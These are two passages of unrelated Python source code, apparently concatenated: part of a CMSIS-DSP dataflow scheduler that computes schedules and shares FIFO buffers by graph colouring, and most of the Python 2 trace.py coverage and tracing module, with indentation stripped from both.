self._liveInterval=(-1,-1)
# shared buffer number not yet allocated
self.sharedNB=-1
# For c code generation
@property
def isArrayAsInt(self):
if self.isArray:
return(1)
else:
return(0)
@property
def hasDelay(self):
return(self.delay>0)
def dump(self):
print("array %d len %d %s id %d src %s:%s dst %s:%s " %
(self.isArray,
self.length,
self.theType.ctype,
self.fifoID,
self.src.owner.nodeID,
self.src.name,
self.dst.owner.nodeID,
self.dst.name))
@property
def fifoID(self):
return self._fifoID
def recordWrite(self,theTime):
start,stop=self._liveInterval
if start==-1:
self._liveInterval=(theTime,stop)
def recordRead(self,theTime):
start,stop=self._liveInterval
if (theTime > stop):
self._liveInterval=(start,theTime)
def analyzeStep(vec,allFIFOs,theTime):
"""Analyze an evolution step to know which FIFOs are read and written to"""
fifoID = 0
for fifo in (vec > 0):
if fifo:
allFIFOs[fifoID].recordWrite(theTime)
fifoID = fifoID + 1
fifoID = 0
for fifo in (vec < 0):
if fifo:
allFIFOs[fifoID].recordRead(theTime)
fifoID = fifoID + 1
class Graph():
def __init__(self):
self._nodes={}
self._edges={}
self._delays={}
self._constantEdges={}
self._g = nx.Graph()
self._sortedNodes=None
self._totalMemory=0
self._allFIFOs = None
self._allBuffers = None
def connect(self,nodea,nodeb):
# When connecting to a constant node we do nothing
# since there is no FIFO in this case
# and it does not participate to the scheduling.
if (isinstance(nodea,Constant)):
nodeb.constantNode = nodea
self._constantEdges[(nodea,nodeb)]=True
else:
if nodea.compatible(nodeb):
self._sortedNodes = None
self._sortedEdges = None
self._g.add_edge(nodea.owner,nodeb.owner)
nodea.fifo = (nodea,nodeb)
nodeb.fifo = (nodea,nodeb)
self._edges[(nodea,nodeb)]=True
if not (nodea.owner in self._nodes):
self._nodes[nodea.owner]=True
if not (nodeb.owner in self._nodes):
self._nodes[nodeb.owner]=True
else:
raise IncompatibleIO
def connectWithDelay(self,nodea,nodeb,delay):
# We cannot connect with delay to a constant node
if (isinstance(nodea,Constant)):
raise CannotDelayConstantError
else:
self.connect(nodea,nodeb)
self._delays[(nodea,nodeb)] = delay
def __str__(self):
res=""
for (a,b) in self._edges:
nodea = a.owner
nodeb = b.owner
res += ("%s.%s -> %s.%s\n" % (nodea.nodeID,a.name, nodeb.nodeID,b.name))
return(res)
def initializeFIFODescriptions(self,config,allFIFOs, fifoLengths,maxTime):
"""Initialize FIFOs datastructure"""
for fifo in allFIFOs:
edge = self._sortedEdges[fifo.fifoID]
fifo.length = fifoLengths[fifo.fifoID]
src,dst = edge
fifo.src=src
fifo.dst=dst
fifo.delay=self.getDelay(edge)
# When a FIFO is working as an array then its buffer may
# potentially be shared with other FIFOs workign as arrays
if src.nbSamples == dst.nbSamples:
if fifo.delay==0:
fifo.isArray = True
fifo.theType = src.theType
#fifo.dump()
bufferID=0
allBuffers=[]
# Compute a graph describing when FIFOs are used at the same time
# The use graph coloring to allocate buffer to those FIFOs.
# Then size the buffer based on the longest FIFO using it
if config.memoryOptimization:
G = nx.Graph()
for fifo in allFIFOs:
if fifo.isArray:
G.add_node(fifo)
# Create the interference graph
# Dictionary of active FIFOs at a given time.
# The time is a scheduling step
active={}
currentTime=0
while currentTime<=maxTime:
# Remove fifo no more active.
# Thei stop time < currenTime
toDelete=[]
for k in active:
start,stop=k._liveInterval
if stop<currentTime:
toDelete.append(k)
for k in toDelete:
del active[k]
# Check FIFOs becoming active.
# They are added to the active list
# and an interference edge is added between thus FIFO
# and all the FIFOs active at same time.
for fifo in allFIFOs:
if fifo.isArray:
start,stop=fifo._liveInterval
# If a src -> node -> dst
# At time t, node will read for src and the stop time
# will be currentTime t.
# And it will write to dst and the start time will be
# currentTime
# So, src and dst are both live at this time.
# Which means the condition on the stop time must be
# stop >= currentTime and not a strict comparison
if start<=currentTime and stop >= currentTime:
if not (fifo in active):
for k in active:
G.add_edge(k,fifo)
active[fifo]=True
currentTime = currentTime + 1
# To debug and display the graph
if False:
labels={}
for n in G.nodes:
labels[n]="%s -> %s" % (n.src.owner.nodeName,n.dst.owner.nodeName)
pos = nx.spring_layout(G, seed=3113794652)
subax1 = plt.subplot(121)
nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)
nx.draw_networkx_labels(G, pos, labels, font_size=10)
plt.show()
quit()
# Graph coloring
d = nx.coloring.greedy_color(G, strategy="largest_first")
# Allocate the colors (buffer ID) to the FIFO
# and keep track of the max color number
# Since other buffers (for real FIFOs) will have their
# numbering start after this one.
for fifo in d:
fifo.sharedNB=d[fifo]
bufferID=max(bufferID,fifo.sharedNB)
# Compute the max size for each shared buffer
maxSizes={}
for fifo in d:
lengthInBytes = fifo.theType.bytes * fifo.length
if fifo.sharedNB in maxSizes:
maxSizes[fifo.sharedNB] = max(maxSizes[fifo.sharedNB],lengthInBytes)
else:
maxSizes[fifo.sharedNB]=lengthInBytes
# Create the buffers
for theID in maxSizes:
sharedA = FifoBuffer(theID,CType(UINT8),maxSizes[theID])
allBuffers.append(sharedA)
for fifo in allFIFOs:
# Use shared buffer if memory optimization
if fifo.isArray and config.memoryOptimization:
fifo.buffer=allBuffers[fifo.sharedNB]
fifo.bufferID=fifo.sharedNB
# Create a new buffer for a real FIFO
# Use bufferID which is starting after the numbers allocated
# to shared buffers
else:
buf = FifoBuffer(bufferID,fifo.theType,fifo.length)
allBuffers.append(buf)
fifo.buffer=buf
fifo.bufferID = bufferID
bufferID = bufferID + 1
# Compute the total memory used in bytes
self._totalMemory = 0
for buf in allBuffers:
self._totalMemory = self._totalMemory + buf._theType.bytes * buf._length
#for fifo in allFIFOs:
# fifo.dump()
return(allBuffers)
@property
def constantEdges(self):
return list(self._constantEdges.keys())
@property
def nodes(self):
return list(self._nodes.keys())
@property
def edges(self):
return list(self._edges.keys())
def hasDelay(self,edge):
return(edge in self._delays)
def getDelay(self,edge):
if self.hasDelay(edge):
return(self._delays[edge])
else:
return(0)
def checkGraph(self):
if not nx.is_connected(self._g):
raise GraphIsNotConnected
def topologyMatrix(self):
self.checkGraph()
rows=[]
# This is used in schedule generation
# and all functions must use the same node ordering
self._sortedNodes = sorted(self.nodes, key=lambda x: x.nodeID)
# Arbitrary order but used for now
self._sortedEdges = self.edges.copy()
#for x in self._sorted:
# print(x.nodeID)
for edge in self._sortedEdges:
na,nb = edge
currentRow=[0] * len(self._sortedNodes)
ia=self._sortedNodes.index(na.owner)
ib=self._sortedNodes.index(nb.owner)
# Produced by na on the edge
currentRow[ia] = na.nbSamples
# Consumed by nb on the edge
currentRow[ib] = -nb.nbSamples
rows.append(currentRow)
return(np.array(rows))
def nullVector(self):
m = self.topologyMatrix()
r=Matrix(m).nullspace()
if len(r) != 1:
raise NotSchedulableError
result=list(r[0])
denominators = [x.q for x in result]
# Remove denominators
ppcm = ilcm(*denominators)
#print(ppcm)
intValues = [x * ppcm for x in result]
# Convert intValues to the smallest possible values
gcd = igcd(*intValues)
return([x / gcd for x in intValues])
@property
def initEvolutionVector(self):
"""Initial FIFO state taking into account delays"""
return(np.array([self.getDelay(x) for x in self.edges]))
def evolutionVectorForNode(self,nodeID):
"""Return the evolution vector corresponding to a selected node"""
v = np.zeros(len(self._sortedNodes))
v[nodeID] = 1
return(v)
def computeSchedule(self,config=Configuration()):
# Init values
initB = self.initEvolutionVector
initN = self.nullVector()
# Current values (copys)
b = np.array(initB)
n = np.array(initN)
if config.displayFIFOSizes:
for edge in self._sortedEdges:
print("%s:%s -> %s:%s" % (edge[0].owner.nodeID,edge[0].name,edge[1].owner.nodeID,edge[1].name))
print(b)
# Topology matrix
t = np.array(self.topologyMatrix())
# Define the list of FIFOs objects
nbFIFOS = t.shape[0]
allFIFOs = []
for i in range(nbFIFOS):
allFIFOs.append(FIFODesc(i))
# Normalization vector
normV = 1.0*np.apply_along_axis(abs,1,t).max(axis=1)
# bMax below is used to track maximum FIFO size
# occuring during a run of the schedule
#
# The heuristric is:
#
# First we compute on each edge the maximum absolute value
# It is the minimum amount of data an edge must contain
# for the system to work either because it is produced
# by a node or consumed by another.
# We use this value as an unit of measurement for the edge.
# So, we normalize the FIFO lengths by this size.
# If this occupancy number is > 1 then it means
# that enough data is available on the FIFO for the
# consumer to consume it.
# When we select a node for scheduling later we try
# to minimize the occupancy number of all FIFOs by
# selecting the schedulign which is giving the
# minimum maximum occupancy number after the run.
bMax = 1.0*np.array(initB) / normV
schedule=[]
zeroVec = np.zeros(len(self._sortedNodes))
evolutionTime = 0
# While there are remaining nodes to schedule
while (n != zeroVec).any():
# Look for the best mode to schedule
# which is the one giving the minimum FIFO increase
# None selected
selected = -1
# Min FIFO size found
minVal = 10000000
nodeID = 0
for node in self._sortedNodes:
# If the node can be scheduled
if n[nodeID] > 0:
# Evolution vector if this node is selected
v = self.evolutionVectorForNode(nodeID)
# New fifos size after this evolution
newB = np.dot(t,v) + b
# Check that there is no FIFO underflow:
if np.all(newB >= 0):
# Total FIFO size for this possible execution
# We normalize to get the occupancy number as explained above
theMin = (1.0*np.array(newB) / normV).max()
# If this possible evolution is giving smaller FIFO size
# (measured in occupancy number) then it is selected
if theMin <= minVal:
minVal = theMin
selected = nodeID
nodeID = nodeID + 1
# No node could be scheduled because of not enough data
# in the FIFOs. It should not occur if there is a null
# space of dimension 1. So, it is probably a bug if
# this exception is raised
if selected < 0:
raise DeadlockError
# Now we have evaluated all schedulable nodes for this run
# and selected the one giving the smallest FIFO increase
# Real evolution vector for selected node
evol = self.evolutionVectorForNode(selected)
# Keep track that this node has been schedule
n = n - evol
# Compute new fifo state
fifoChange = np.dot(t,evol)
b = fifoChange + b
if config.displayFIFOSizes:
print(b)
bMax = np.maximum(b,bMax)
schedule.append(selected)
# Analyze FIFOs to know if a FIFOs write is
# followed immediately by a FIFO read of same size
analyzeStep(fifoChange,allFIFOs,evolutionTime)
evolutionTime = evolutionTime + 1
fifoMax=np.floor(bMax).astype(np.int32)
allBuffers=self.initializeFIFODescriptions(config,allFIFOs,fifoMax,evolutionTime)
self._allFIFOs = allFIFOs
self._allBuffers = allBuffers
return(Schedule(self,self._sortedNodes,self._sortedEdges,schedule))
class Schedule:
def __init__(self,g,sortedNodes,sortedEdges,schedule):
self._sortedNodes=sortedNodes
self._sortedEdges=sortedEdges
self._schedule = schedule
self._graph = g
# Nodes containing pure functions (no state) like some
# CMSIS-DSP functions.
# When scheduling is using the option codeArray, the
# schedule is encoded as an array.
# Function calls cannot be inlined anymore and we need
# to create new nodes for those function calls.
# The pureNode structure is done for this.
# It is a record because we want to reuse nodes for same
# types.
self._pureNodes={}
nodeCodeID = 0
pureClassID = 1
for n in self.nodes:
n.codeID = nodeCodeID
nodeCodeID = nodeCodeID + 1
# Constant nodes are ignored since they have
# no arcs, and are connected to no FIFOs
theArgs=[]
theArgTypes=[]
i,o=n.allIOs()
for io in i:
# An io connected to a constant node has no fifo
if not io.fifo is None:
theArgs.append(self.fifoID(io.fifo))
theArgTypes.append(io.ctype)
else:
# Instead the arg is the name of a constant node
# instead of being a fifo ID
theArgs.append(io.constantNode.name)
theArgTypes.append(io.constantNode.name)
for io in o:
theArgs.append(self.fifoID(io.fifo))
theArgTypes.append(io.ctype)
n.args=theArgs
# Analyze the nature of arguments for pure functions
# The information created during this analysis
# is useful when generating a class containing the
# pure function
if not n.hasState:
theType=(n.nodeName,tuple(theArgTypes))
if not theType in self._pureNodes:
self._pureNodes[theType]=n
n.pureClassID = pureClassID
pureClassID = pureClassID + 1
else:
n.pureClassID = self._pureNodes[theType].pureClassID
n.pureNodeType=theType
n.analyzeArgs()
def hasDelay(self,edge):
return(self._graph.hasDelay(edge))
def getDelay(self,edge):
return(self._graph.getDelay(edge))
@property
def pureNodes(self):
return self._pureNodes
@property
def constantEdges(self):
return self._graph.constantEdges
@property
def nodes(self):
return self._sortedNodes
@property
def edges(self):
return self._sortedEdges
@property
def schedule(self):
return self._schedule
#@property
#def fifoLengths(self):
# return self._fifos
@property
def scheduleLength(self):
return len(self.schedule)
@property
def memory(self):
#theBytes=[x[0].theType.bytes for x in self.edges]
#theSizes=[x[0]*x[1] for x in zip(self.fifoLengths,theBytes)]
#return(np.sum(theSizes))
return(self._graph._totalMemory)
@property
def graph(self):
return self._graph
def fifoID(self,edge):
return(self.edges.index(edge))
def outputFIFOs(self,node):
outs=[]
for io in node.outputNames:
x = node._outputs[io]
fifo=(self.fifoID(x.fifo),io)
outs.append(fifo)
return(outs)
def ccode(self,directory,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.ccode.gencode(self,directory,config)
def pythoncode(self,directory,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.pythoncode.gencode(self,directory,config)
def graphviz(self,f,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.graphviz.gengraph(self,f,config)
|
|
#!/usr/bin/env python
# portions copyright 2001, Autonomous Zones Industries, Inc., all rights...
# err... reserved and offered to the public under the terms of the
# Python 2.2 license.
# Author: Zooko O'Whielacronx
# http://zooko.com/
# mailto:zooko@zooko.com
#
# Copyright 2000, Mojam Media, Inc., all rights reserved.
# Author: Skip Montanaro
#
# Copyright 1999, Bioreason, Inc., all rights reserved.
# Author: Andrew Dalke
#
# Copyright 1995-1997, Automatrix, Inc., all rights reserved.
# Author: Skip Montanaro
#
# Copyright 1991-1995, Stichting Mathematisch Centrum, all rights reserved.
#
#
# Permission to use, copy, modify, and distribute this Python software and
# its associated documentation for any purpose without fee is hereby
# granted, provided that the above copyright notice appears in all copies,
# and that both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of neither Automatrix,
# Bioreason or Mojam Media be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior permission.
#
"""program/module to trace Python program or function execution
Sample use, command line:
trace.py -c -f counts --ignore-dir '$prefix' spam.py eggs
trace.py -t --ignore-dir '$prefix' spam.py eggs
trace.py --trackcalls spam.py eggs
Sample use, programmatically
import sys
# create a Trace object, telling it what to ignore, and whether to
# do tracing or line-counting or both.
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,], trace=0,
count=1)
# run the new command using the given tracer
tracer.run('main()')
# make a report, placing output in /tmp
r = tracer.results()
r.write_results(show_missing=True, coverdir="/tmp")
"""
import linecache
import os
import re
import sys
import time
import token
import tokenize
import inspect
import gc
import dis
try:
import cPickle
pickle = cPickle
except ImportError:
import pickle
try:
import threading
except ImportError:
_settrace = sys.settrace
def _unsettrace():
sys.settrace(None)
else:
def _settrace(func):
threading.settrace(func)
sys.settrace(func)
def _unsettrace():
sys.settrace(None)
threading.settrace(None)
def usage(outfile):
outfile.write("""Usage: %s [OPTIONS] <file> [ARGS]
Meta-options:
--help Display this help then exit.
--version Output version information then exit.
Otherwise, exactly one of the following three options must be given:
-t, --trace Print each line to sys.stdout before it is executed.
-c, --count Count the number of times each line is executed
and write the counts to <module>.cover for each
module executed, in the module's directory.
See also `--coverdir', `--file', `--no-report' below.
-l, --listfuncs Keep track of which functions are executed at least
once and write the results to sys.stdout after the
program exits.
-T, --trackcalls Keep track of caller/called pairs and write the
results to sys.stdout after the program exits.
-r, --report Generate a report from a counts file; do not execute
any code. `--file' must specify the results file to
read, which must have been created in a previous run
with `--count --file=FILE'.
Modifiers:
-f, --file=<file> File to accumulate counts over several runs.
-R, --no-report Do not generate the coverage report files.
Useful if you want to accumulate over several runs.
-C, --coverdir=<dir> Directory where the report files. The coverage
report for <package>.<module> is written to file
<dir>/<package>/<module>.cover.
-m, --missing Annotate executable lines that were not executed
with '>>>>>> '.
-s, --summary Write a brief summary on stdout for each file.
(Can only be used with --count or --report.)
-g, --timing Prefix each line with the time since the program started.
Only used while tracing.
Filters, may be repeated multiple times:
--ignore-module=<mod> Ignore the given module(s) and its submodules
(if it is a package). Accepts comma separated
list of module names
--ignore-dir=<dir> Ignore files in the given directory (multiple
directories can be joined by os.pathsep).
""" % sys.argv[0])
PRAGMA_NOCOVER = "#pragma NO COVER"
# Simple rx to find lines with no code.
rx_blank = re.compile(r'^\s*(#.*)?$')
class Ignore:
def __init__(self, modules = None, dirs = None):
self._mods = modules or []
self._dirs = dirs or []
self._dirs = map(os.path.normpath, self._dirs)
self._ignore = { '<string>': 1 }
def names(self, filename, modulename):
if modulename in self._ignore:
return self._ignore[modulename]
# haven't seen this one before, so see if the module name is
# on the ignore list. Need to take some care since ignoring
# "cmp" musn't mean ignoring "cmpcache" but ignoring
# "Spam" must also mean ignoring "Spam.Eggs".
for mod in self._mods:
if mod == modulename: # Identical names, so ignore
self._ignore[modulename] = 1
return 1
# check if the module is a proper submodule of something on
# the ignore list
n = len(mod)
# (will not overflow since if the first n characters are the
# same and the name has not already occurred, then the size
# of "name" is greater than that of "mod")
if mod == modulename[:n] and modulename[n] == '.':
self._ignore[modulename] = 1
return 1
# Now check that __file__ isn't in one of the directories
if filename is None:
# must be a built-in, so we must ignore
self._ignore[modulename] = 1
return 1
# Ignore a file when it contains one of the ignorable paths
for d in self._dirs:
# The '+ os.sep' is to ensure that d is a parent directory,
# as compared to cases like:
# d = "/usr/local"
# filename = "/usr/local.py"
# or
# d = "/usr/local.py"
# filename = "/usr/local.py"
if filename.startswith(d + os.sep):
self._ignore[modulename] = 1
return 1
# Tried the different ways, so we don't ignore this module
self._ignore[modulename] = 0
return 0
def modname(path):
"""Return a plausible module name for the patch."""
base = os.path.basename(path)
filename, ext = os.path.splitext(base)
return filename
def fullmodname(path):
"""Return a plausible module name for the path."""
# If the file 'path' is part of a package, then the filename isn't
# enough to uniquely identify it. Try to do the right thing by
# looking in sys.path for the longest matching prefix. We'll
# assume that the rest is the package name.
comparepath = os.path.normcase(path)
longest = ""
for dir in sys.path:
dir = os.path.normcase(dir)
if comparepath.startswith(dir) and comparepath[len(dir)] == os.sep:
if len(dir) > len(longest):
longest = dir
if longest:
base = path[len(longest) + 1:]
else:
base = path
# the drive letter is never part of the module name
drive, base = os.path.splitdrive(base)
base = base.replace(os.sep, ".")
if os.altsep:
base = base.replace(os.altsep, ".")
filename, ext = os.path.splitext(base)
return filename.lstrip(".")
class CoverageResults:
def __init__(self, counts=None, calledfuncs=None, infile=None,
callers=None, outfile=None):
self.counts = counts
if self.counts is None:
self.counts = {}
self.counter = self.counts.copy() # map (filename, lineno) to count
self.calledfuncs = calledfuncs
if self.calledfuncs is None:
self.calledfuncs = {}
self.calledfuncs = self.calledfuncs.copy()
self.callers = callers
if self.callers is None:
self.callers = {}
self.callers = self.callers.copy()
self.infile = infile
self.outfile = outfile
if self.infile:
# Try to merge existing counts file.
try:
counts, calledfuncs, callers = \
pickle.load(open(self.infile, 'rb'))
self.update(self.__class__(counts, calledfuncs, callers))
except (IOError, EOFError, ValueError), err:
print >> sys.stderr, ("Skipping counts file %r: %s"
% (self.infile, err))
def update(self, other):
"""Merge in the data from another CoverageResults"""
counts = self.counts
calledfuncs = self.calledfuncs
callers = self.callers
other_counts = other.counts
other_calledfuncs = other.calledfuncs
other_callers = other.callers
for key in other_counts.keys():
counts[key] = counts.get(key, 0) + other_counts[key]
for key in other_calledfuncs.keys():
calledfuncs[key] = 1
for key in other_callers.keys():
callers[key] = 1
def write_results(self, show_missing=True, summary=False, coverdir=None):
"""
@param coverdir
"""
if self.calledfuncs:
print
print "functions called:"
calls = self.calledfuncs.keys()
calls.sort()
for filename, modulename, funcname in calls:
print ("filename: %s, modulename: %s, funcname: %s"
% (filename, modulename, funcname))
if self.callers:
print
print "calling relationships:"
calls = self.callers.keys()
calls.sort()
lastfile = lastcfile = ""
for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) in calls:
if pfile != lastfile:
print
print "***", pfile, "***"
lastfile = pfile
lastcfile = ""
if cfile != pfile and lastcfile != cfile:
print " -->", cfile
lastcfile = cfile
print " %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc)
# turn the counts data ("(filename, lineno) = count") into something
# accessible on a per-file basis
per_file = {}
for filename, lineno in self.counts.keys():
lines_hit = per_file[filename] = per_file.get(filename, {})
lines_hit[lineno] = self.counts[(filename, lineno)]
# accumulate summary info, if needed
sums = {}
for filename, count in per_file.iteritems():
# skip some "files" we don't care about...
if filename == "<string>":
continue
if filename.startswith("<doctest "):
continue
if filename.endswith((".pyc", ".pyo")):
filename = filename[:-1]
if coverdir is None:
dir = os.path.dirname(os.path.abspath(filename))
modulename = modname(filename)
else:
dir = coverdir
if not os.path.exists(dir):
os.makedirs(dir)
modulename = fullmodname(filename)
# If desired, get a list of the line numbers which represent
# executable content (returned as a dict for better lookup speed)
if show_missing:
lnotab = find_executable_linenos(filename)
else:
lnotab = {}
source = linecache.getlines(filename)
coverpath = os.path.join(dir, modulename + ".cover")
n_hits, n_lines = self.write_results_file(coverpath, source,
lnotab, count)
if summary and n_lines:
percent = 100 * n_hits // n_lines
sums[modulename] = n_lines, percent, modulename, filename
if summary and sums:
mods = sums.keys()
mods.sort()
print "lines cov% module (path)"
for m in mods:
n_lines, percent, modulename, filename = sums[m]
print "%5d %3d%% %s (%s)" % sums[m]
if self.outfile:
# try and store counts and module info into self.outfile
try:
pickle.dump((self.counts, self.calledfuncs, self.callers),
open(self.outfile, 'wb'), 1)
except IOError, err:
print >> sys.stderr, "Can't save counts files because %s" % err
def write_results_file(self, path, lines, lnotab, lines_hit):
"""Return a coverage results file in path."""
try:
outfile = open(path, "w")
except IOError, err:
print >> sys.stderr, ("trace: Could not open %r for writing: %s"
"- skipping" % (path, err))
return 0, 0
n_lines = 0
n_hits = 0
for i, line in enumerate(lines):
lineno = i + 1
# do the blank/comment match to try to mark more lines
# (help the reader find stuff that hasn't been covered)
if lineno in lines_hit:
outfile.write("%5d: " % lines_hit[lineno])
n_hits += 1
n_lines += 1
elif rx_blank.match(line):
outfile.write(" ")
else:
# lines preceded by no marks weren't hit
# Highlight them if so indicated, unless the line contains
# #pragma: NO COVER
if lineno in lnotab and not PRAGMA_NOCOVER in lines[i]:
outfile.write(">>>>>> ")
n_lines += 1
else:
outfile.write(" ")
outfile.write(lines[i].expandtabs(8))
outfile.close()
return n_hits, n_lines
def find_lines_from_code(code, strs):
"""Return dict where keys are lines in the line number table."""
linenos = {}
for _, lineno in dis.findlinestarts(code):
if lineno not in strs:
linenos[lineno] = 1
return linenos
def find_lines(code, strs):
"""Return lineno dict for all code objects reachable from code."""
# get all of the lineno information from the code of this scope level
linenos = find_lines_from_code(code, strs)
# and check the constants for references to other code objects
for c in code.co_consts:
if inspect.iscode(c):
# find another code object, so recurse into it
linenos.update(find_lines(c, strs))
return linenos
def find_strings(filename):
"""Return a dict of possible docstring positions.
The dict maps line numbers to strings. There is an entry for
line that contains only a string or a part of a triple-quoted
string.
"""
d = {}
# If the first token is a string, then it's the module docstring.
# Add this special case so that the test in the loop passes.
prev_ttype = token.INDENT
f = open(filename)
for ttype, tstr, start, end, line in tokenize.generate_tokens(f.readline):
if ttype == token.STRING:
if prev_ttype == token.INDENT:
sline, scol = start
eline, ecol = end
for i in range(sline, eline + 1):
d[i] = 1
prev_ttype = ttype
f.close()
return d
def find_executable_linenos(filename):
"""Return dict where keys are line numbers in the line number table."""
try:
prog = open(filename, "rU").read()
except IOError, err:
print >> sys.stderr, ("Not printing coverage data for %r: %s"
% (filename, err))
return {}
code = compile(prog, filename, "exec")
strs = find_strings(filename)
return find_lines(code, strs)
class Trace:
def __init__(self, count=1, trace=1, countfuncs=0, countcallers=0,
ignoremods=(), ignoredirs=(), infile=None, outfile=None,
timing=False):
"""
@param count true iff it should count number of times each
line is executed
@param trace true iff it should print out each line that is
being counted
@param countfuncs true iff it should just output a list of
(filename, modulename, funcname,) for functions
that were called at least once; This overrides
`count' and `trace'
@param ignoremods a list of the names of modules to ignore
@param ignoredirs a list of the names of directories to ignore
all of the (recursive) contents of
@param infile file from which to read stored counts to be
added into the results
@param outfile file in which to write the results
@param timing true iff timing information be displayed
"""
self.infile = infile
self.outfile = outfile
self.ignore = Ignore(ignoremods, ignoredirs)
self.counts = {} # keys are (filename, linenumber)
self.blabbed = {} # for debugging
self.pathtobasename = {} # for memoizing os.path.basename
self.donothing = 0
self.trace = trace
self._calledfuncs = {}
self._callers = {}
self._caller_cache = {}
self.start_time = None
if timing:
self.start_time = time.time()
if countcallers:
self.globaltrace = self.globaltrace_trackcallers
elif countfuncs:
self.globaltrace = self.globaltrace_countfuncs
elif trace and count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace_and_count
elif trace:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace
elif count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_count
else:
# Ahem -- do nothing? Okay.
self.donothing = 1
def run(self, cmd):
import __main__
dict = __main__.__dict__
self.runctx(cmd, dict, dict)
def runctx(self, cmd, globals=None, locals=None):
if globals is None: globals = {}
if locals is None: locals = {}
if not self.donothing:
_settrace(self.globaltrace)
try:
exec cmd in globals, locals
finally:
if not self.donothing:
_unsettrace()
def runfunc(self, func, *args, **kw):
result = None
if not self.donothing:
sys.settrace(self.globaltrace)
try:
result = func(*args, **kw)
finally:
if not self.donothing:
sys.settrace(None)
return result
def file_module_function_of(self, frame):
code = frame.f_code
filename = code.co_filename
if filename:
modulename = modname(filename)
else:
modulename = None
funcname = code.co_name
clsname = None
if code in self._caller_cache:
if self._caller_cache[code] is not None:
clsname = self._caller_cache[code]
else:
self._caller_cache[code] = None
## use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
funcs = [f for f in gc.get_referrers(code)
if inspect.isfunction(f)]
# require len(func) == 1 to avoid ambiguity caused by calls to
# new.function(): "In the face of ambiguity, refuse the
# temptation to guess."
if len(funcs) == 1:
dicts = [d for d in gc.get_referrers(funcs[0])
if isinstance(d, dict)]
if len(dicts) == 0:
# PyPy may store functions directly on the class
# (more exactly: the container is not a Python object)
dicts = funcs
if len(dicts) == 1:
classes = [c for c in gc.get_referrers(dicts[0])
if hasattr(c, "__bases__")]
if len(classes) == 1:
# ditto for new.classobj()
clsname = classes[0].__name__
# cache the result - assumption is that new.* is
# not called later to disturb this relationship
# _caller_cache could be flushed if functions in
# the new module get called.
self._caller_cache[code] = clsname
if clsname is not None:
funcname = "%s.%s" % (clsname, funcname)
return filename, modulename, funcname
def globaltrace_trackcallers(self, frame, why, arg):
"""Handler for call events.
Adds information about who called who to the self._callers dict.
"""
if why == 'call':
# XXX Should do a better job of identifying methods
this_func = self.file_module_function_of(frame)
parent_func = self.file_module_function_of(frame.f_back)
self._callers[(parent_func, this_func)] = 1
def globaltrace_countfuncs(self, frame, why, arg):
"""Handler for call events.
Adds (filename, modulename, funcname) to the self._calledfuncs dict.
"""
if why == 'call':
this_func = self.file_module_function_of(frame)
self._calledfuncs[this_func] = 1
def globaltrace_lt(self, frame, why, arg):
"""Handler for call events.
If the code block being entered is to be ignored, returns `None',
else returns self.localtrace.
"""
if why == 'call':
code = frame.f_code
filename = frame.f_globals.get('__file__', None)
if filename:
# XXX modname() doesn't work right for packages, so
# the ignore support won't work right for packages
modulename = modname(filename)
if modulename is not None:
ignore_it = self.ignore.names(filename, modulename)
if not ignore_it:
if self.trace:
print (" --- modulename: %s, funcname: %s"
% (modulename, code.co_name))
return self.localtrace
else:
return None
def localtrace_trace_and_count(self, frame, why, arg):
if why == "line":
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = filename, lineno
self.counts[key] = self.counts.get(key, 0) + 1
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print "%s(%d): %s" % (bname, lineno,
linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_trace(self, frame, why, arg):
if why == "line":
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print "%s(%d): %s" % (bname, lineno,
linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_count(self, frame, why, arg):
if why == "line":
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = filename, lineno
self.counts[key] = self.counts.get(key, 0) + 1
return self.localtrace
def results(self):
return CoverageResults(self.counts, infile=self.infile,
outfile=self.outfile,
calledfuncs=self._calledfuncs,
callers=self._callers)
def _err_exit(msg):
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.exit(1)
def main(argv=None):
import getopt
if argv is None:
argv = sys.argv
try:
opts, prog_argv = getopt.getopt(argv[1:], "tcrRf:d:msC:lTg",
["help", "version", "trace", "count",
"report", "no-report", "summary",
"file=", "missing",
"ignore-module=", "ignore-dir=",
"coverdir=", "listfuncs",
"trackcalls", "timing"])
except getopt.error, msg:
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.stderr.write("Try `%s --help' for more information\n"
% sys.argv[0])
sys.exit(1)
trace = 0
count = 0
report = 0
no_report = 0
counts_file = None
missing = 0
ignore_modules = []
ignore_dirs = []
coverdir = None
summary = 0
listfuncs = False
countcallers = False
timing = False
for opt, val in opts:
if opt == "--help":
usage(sys.stdout)
sys.exit(0)
if opt == "--version":
sys.stdout.write("trace 2.0\n")
sys.exit(0)
if opt == "-T" or opt == "--trackcalls":
countcallers = True
continue
if opt == "-l" or opt == "--listfuncs":
listfuncs = True
continue
if opt == "-g" or opt == "--timing":
timing = True
continue
if opt == "-t" or opt == "--trace":
trace = 1
continue
if opt == "-c" or opt == "--count":
count = 1
continue
if opt == "-r" or opt == "--report":
report = 1
continue
if opt == "-R" or opt == "--no-report":
no_report = 1
continue
if opt == "-f" or opt == "--file":
counts_file = val
continue
if opt == "-m" or opt == "--missing":
missing = 1
continue
if opt == "-C" or opt == "--coverdir":
coverdir = val
continue
if opt == "-s" or opt == "--summary":
summary = 1
continue
if opt == "--ignore-module":
for mod in val.split(","):
ignore_modules.append(mod.strip())
continue
